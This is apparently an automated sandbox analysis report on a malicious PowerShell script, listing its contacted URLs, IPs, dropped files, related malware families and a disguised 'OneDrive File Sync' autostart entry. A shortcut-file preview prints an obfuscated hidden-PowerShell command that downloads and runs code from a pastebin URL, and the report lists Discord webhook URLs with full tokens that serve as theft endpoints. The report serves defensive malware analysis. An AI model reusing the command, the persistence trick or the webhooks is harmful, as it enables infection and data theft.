              https://pastebin.com/raw/6db99fAK | false | | unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt | false | | unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt | false | | unknown
              http://pastebin.com/raw/sA04Mwk2 | false | | unknown
              https://pastebin.com/raw/sA04Mwk2 | false | | unknown
              https://pastebin.com/raw/zNCj2Utm | true | | unknown
              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 | true | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://discord.com | powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_ | powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ | powershell.exe, 0000000A.00000002.2088268444.000002732B06C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880B8D000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://pastebin.com/raw/zNCj2Utm8e | powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86081F000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://go.micro | powershell.exe, 00000001.00000002.1897623908.0000020A9B58C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A9BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: safe | unknown
              http://www.microsoft.co | powershell.exe, 00000001.00000002.1927649993.0000020AB2720000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130172038.0000027342761000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/License | powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://discord.com/ | powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
              http://discord.com | powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://crl.microW | powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-Ca | powershell.exe, 00000001.00000002.1897623908.0000020A9AB62000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9AB67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1897623908.0000020A9A769000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1 | false | | unknown
              https://discord.com/api/webhooks/128545359042878 | powershell.exe, 0000000A.00000002.2088268444.000002732B971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188814AA000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
              https://0.discor | powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://raw.githubusercontent.com | powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F8B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/ | powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1922208784.0000020AAA6A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1922208784.0000020AAA560000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://raw.githubusercontent.com | powershell.exe, 0000000A.00000002.2088268444.000002732AFA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AFD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880AF3000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://go.microsoft.c | powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://go.microsoft.ctain | powershell.exe, 0000000A.00000002.2086833064.000002732873A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A50C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.000001888004A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll | powershell.exe, 00000001.00000002.1897623908.0000020A9A715000.00000004.00000800.00020000.00000000.sdmp, cr_asm_hiddenz.ps1 | false | | unknown
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.1897623908.0000020A9A4F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732A545000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880084000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://0.discord.com/ | powershell.exe, 0000000A.00000002.2088268444.000002732BAA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.00000188815DF000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://pastebin.com | powershell.exe, 0000000A.00000002.2088268444.000002732AF28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AC54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2088268444.000002732AF0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880508000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A74000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://pastebin.com | powershell.exe, 0000000A.00000002.2088268444.000002732AF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E86082B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2161624477.0000018880A64000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
              IP | Domain | Country | ASN | ASN Name | Malicious
              104.20.3.235 | unknown | United States | 13335 | CLOUDFLARENETUS | false
              172.67.19.24 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
              162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | true
              45.144.31.105 | unknown | United Kingdom | 42994 | HQservCommunicationSolutionsIL | false
              185.199.111.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | true
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1534105
                                                                                  Start date and time:2024-10-15 15:52:15 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 7m 32s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:22
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:cr_asm_hiddenz.ps1
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.expl.evad.winPS1@27/29@4/5
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 66.7%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 90%
                                                                                  • Number of executed functions: 27
                                                                                  • Number of non-executed functions: 3
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .ps1
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 316 because it is empty
              • Not all processes were analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: cr_asm_hiddenz.ps1
              Time | Type | Description
              09:53:22 | API Interceptor | 1825994x Sleep call for process: powershell.exe modified
              14:53:51 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
              14:54:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.3.235 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.3.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.3.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | Invoice-883973938.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | 2024 12_59_31 a.m..js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.3.235 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | steamcodegenerator.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | cr_asm.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
172.67.19.24 | envifa.vbs | malicious | Unknown | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | sostener.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
172.67.19.24 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | Dadebehring PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
172.67.19.24 | PendingInvoiceBankDetails.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
Match | Associated Sample Name / URL | Detection | Threat Name | Context
raw.githubusercontent.com | BeginSync lnk.lnk | malicious | Unknown | 185.199.111.133
raw.githubusercontent.com | gaber.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | cr_asm_crypter.ps1 | malicious | Unknown | 185.199.110.133
raw.githubusercontent.com | steamcodegenerator.exe | malicious | Unknown | 185.199.109.133
raw.githubusercontent.com | cr_asm.ps1 | malicious | Unknown | 185.199.108.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, Remcos | 185.199.109.133
raw.githubusercontent.com | na.hta | malicious | Cobalt Strike, FormBook | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | oWARzPF1Ms.exe | malicious | PureCrypter, PureLog Stealer | 185.199.108.133
raw.githubusercontent.com | New PO-RFQ13101.xla.xlsx | malicious | FormBook | 185.199.110.133
discord.com | BeginSync lnk.lnk | malicious | Unknown | 162.159.137.232
discord.com | gaber.ps1 | malicious | Unknown | 162.159.137.232
discord.com | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
discord.com | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
discord.com | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
discord.com | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.136.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.137.232
discord.com | 0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.159.136.232
discord.com | cPl7CoJTBx.exe | malicious | Luna Grabber, Luna Logger | 162.159.128.233
pastebin.com | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235
pastebin.com | gaber.ps1 | malicious | Unknown | 104.20.4.235
pastebin.com | cr_asm_crypter.ps1 | malicious | Unknown | 104.20.4.235
pastebin.com | steamcodegenerator.exe | malicious | Unknown | 172.67.19.24
pastebin.com | cr_asm.ps1 | malicious | Unknown | 172.67.19.24
pastebin.com | xc.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
pastebin.com | w0QdNGUNtd.exe | malicious | RedLine | 104.20.3.235
pastebin.com | DHL_Shipping_Invoices_Awb_0000000.vbs | malicious | Remcos | 104.20.3.235
pastebin.com | SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exe | malicious | Xmrig | 104.20.4.235
pastebin.com | SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exe | malicious | Vidar, Xmrig | 104.20.4.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HQservCommunicationSolutionsIL | SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dll | malicious | Metasploit | 45.144.31.105
HQservCommunicationSolutionsIL | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | 45.144.31.105
HQservCommunicationSolutionsIL | QTmGYKK6SL.exe | malicious | Unknown | 91.194.11.174
HQservCommunicationSolutionsIL | file.exe | malicious | Vidar | 91.194.11.174
HQservCommunicationSolutionsIL | mctsc.exe | malicious | CobaltStrike | 45.144.30.144
HQservCommunicationSolutionsIL | Form_W-9_Ver-083_030913350-67084228u8857-460102.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 91.194.11.64
HQservCommunicationSolutionsIL | MSI.msi | malicious | Bazar Loader, BruteRatel, Latrodectus | 91.194.11.183
HQservCommunicationSolutionsIL | upfilles.dll.dll | malicious | Bazar Loader, BruteRatel, Latrodectus | 91.194.11.183
HQservCommunicationSolutionsIL | QII19aQAik.elf | malicious | Unknown | 91.194.11.55
HQservCommunicationSolutionsIL | SecuriteInfo.com.Win32.DropperX-gen.26130.25747.exe | malicious | PureLog Stealer | 45.144.29.148
CLOUDFLARENETUS | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
CLOUDFLARENETUS | gaber.ps1 | malicious | Unknown | 162.159.137.232
CLOUDFLARENETUS | cr_asm_crypter.ps1 | malicious | Unknown | 162.159.135.232
CLOUDFLARENETUS | steamcodegenerator.exe | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | cr_asm.ps1 | malicious | Unknown | 162.159.138.232
CLOUDFLARENETUS | HqvlYZC7Gf.exe | malicious | Unknown | 104.27.206.92
CLOUDFLARENETUS | https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m- | malicious | Unknown | 162.159.134.42
CLOUDFLARENETUS | https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.html | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | ordine.pdf | malicious | Unknown | 104.21.90.114
CLOUDFLARENETUS | ordine.pdf | malicious | HtmlDropper | 188.114.96.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | BeginSync lnk.lnk | malicious | Unknown | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | gaber.ps1 | malicious | Unknown | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm_crypter.ps1 | malicious | Unknown | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | steamcodegenerator.exe | malicious | Unknown | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | cr_asm.ps1 | malicious | Unknown | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20= | malicious | HTMLPhisher | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | na.hta | malicious | Cobalt Strike, Remcos | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | na.hta | malicious | Cobalt Strike, FormBook | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | LISTA DE COTIZACIONES.exe | malicious | AgentTesla, PureLog Stealer | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
3b5074b1b5d032e5620f69f9f700ff0e | https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.gov | malicious | HTMLPhisher | 104.20.3.235, 172.67.19.24, 162.159.138.232, 185.199.111.133
                                                                                  No context
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
Category: dropped
Size (bytes): 1728
Entropy (8bit): 4.527272298423835
Encrypted: false
SSDEEP: 24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
MD5: 724AA21828AD912CB466E3B0A79F478B
SHA1: 41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
SHA-256: D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
SHA-512: B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
Malicious: true
                                                                                  Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11608
Entropy (8bit): 4.890472898059848
Encrypted: false
SSDEEP: 192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
MD5: 66B287A82D897FD706FD1C8A5098E8A5
SHA1: 9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
SHA-256: 5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
SHA-512: 5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
Malicious: false
                                                                                  Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulm/Z:NllU
                                                                                  MD5:022CA1CFCB1ED572D58EA006B628DA3D
                                                                                  SHA1:657EA7E8B4E0AAC4EA74181FEE54BC7E2230F5F8
                                                                                  SHA-256:67A07D890507E7F7BFD525D2B40C6946B9F74DF80EBBCB09681CF91310B3321F
                                                                                  SHA-512:C5C88D30B1AFCC645367828F889CB0AF847F525D6FDD5ACA397F2C1FA0CDD7E07361171BA01B54785BCFFA86A3AF1D85B9EEDD19ACF4FFFEFDEE5FC17A84B702
                                                                                  Malicious:false
                                                                                  Preview:@...e...............................R..".............@..........
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:20:29 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.9488850344654884
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:H+e9ERrwZsadNGkwZH3wKTFjmNWI+ycuZhNHakS5PNnqSqd:GwZ1zdwZgKTRm41ulHa37qSK
                                                                                  MD5:7F3F4AF92939C7E967A864F770E0B526
                                                                                  SHA1:AF97EABAF4E50340588DB12A51559F4262382A75
                                                                                  SHA-256:721B1F5222857906EE4F4FB659F2F0DB3CEB6452F40B0700F8CEE76011623B4F
                                                                                  SHA-512:A745ABB07B231C84147C66953E3F28A2303CD3EE6BB9730CEA3D3E33A695217A50A82786BB805334DD41DB8E7369FDE7DE82C511EFC1F184C8059280BAAD3EE4
                                                                                  Malicious:false
                                                                                  Preview:L...=..g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP.................n.'.Ch.....nfC............2.......C:\Users\user\AppData\Local\Temp\RES2A1.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Tue Oct 15 15:19:45 2024, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):3.998004806050697
                                                                                  Encrypted:false
